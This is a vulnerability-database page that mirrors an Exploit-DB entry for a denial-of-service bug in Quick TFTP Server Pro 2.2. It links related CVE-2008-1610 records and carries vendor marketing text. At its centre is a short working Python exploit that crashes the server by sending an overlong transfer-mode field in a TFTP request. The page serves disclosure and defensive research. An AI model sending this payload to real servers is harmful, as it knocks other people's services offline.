Lucene search
+L

Quick TFTP Server Pro 2.2 - Denial of Service

🗓️ 07 Jun 2013 00:00:00Reported by npnType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

Quick TFTP Server Pro 2.2 DoS exploit through long mode fiel

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-1610
26 Mar 200800:00
circl
cve
CVE
CVE-2008-1610
1 Apr 200816:00
cve
cvelist
Cvelist
CVE-2008-1610
1 Apr 200816:00
cvelist
exploitdb
Exploit DB
Quick TFTP Server Pro 2.1 - Transfer-Mode Overflow (Metasploit)
15 Jun 201000:00
exploitdb
exploitdb
Exploit DB
Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)
26 Mar 200800:00
exploitdb
metasploit
Metasploit
Quick FTP Pro 2.1 Transfer-Mode Overflow
15 Oct 200811:21
metasploit
nvd
NVD
CVE-2008-1610
1 Apr 200816:44
nvd
packetstorm
Packet Storm
Quick FTP Pro 2.1 Transfer-Mode Overflow
26 Nov 200900:00
packetstorm
prion
Prion
Stack overflow
1 Apr 200816:44
prion
#!/usr/bin/python

#Exploit Title: Quick TFTP Server 2.2 DoS
#Date: 6th June 2013
#Exploit Author: npn
#Exploit Author Homepage: http://www.iodigitalsec.com/
#Exploit Author Write Up: http://www.iodigitalsec.com/blog/fuzz-to-denial-of-service-quick-tftp-server-2-2/
#Vendor Homepage: http://www.tallsoft.com/tftpserver.htm
#Software Link: http://www.tallsoft.com/tftpserver_setup.exe
#Version: 2.2
#Tested on: Windows XP SP3 English

from socket import *
import sys
import select

pwn = "\x00\x02"
pwn += "\x66\x69\x6c\x65\x2e\x74\x78\x74\x00"
pwn += "A"*1200
pwn += "\x00"

address = ('192.168.200.20', 69)
server_socket = socket(AF_INET, SOCK_DGRAM)

server_socket.sendto(pwn, address)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Oct 2016 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.5
EPSS0.53906
26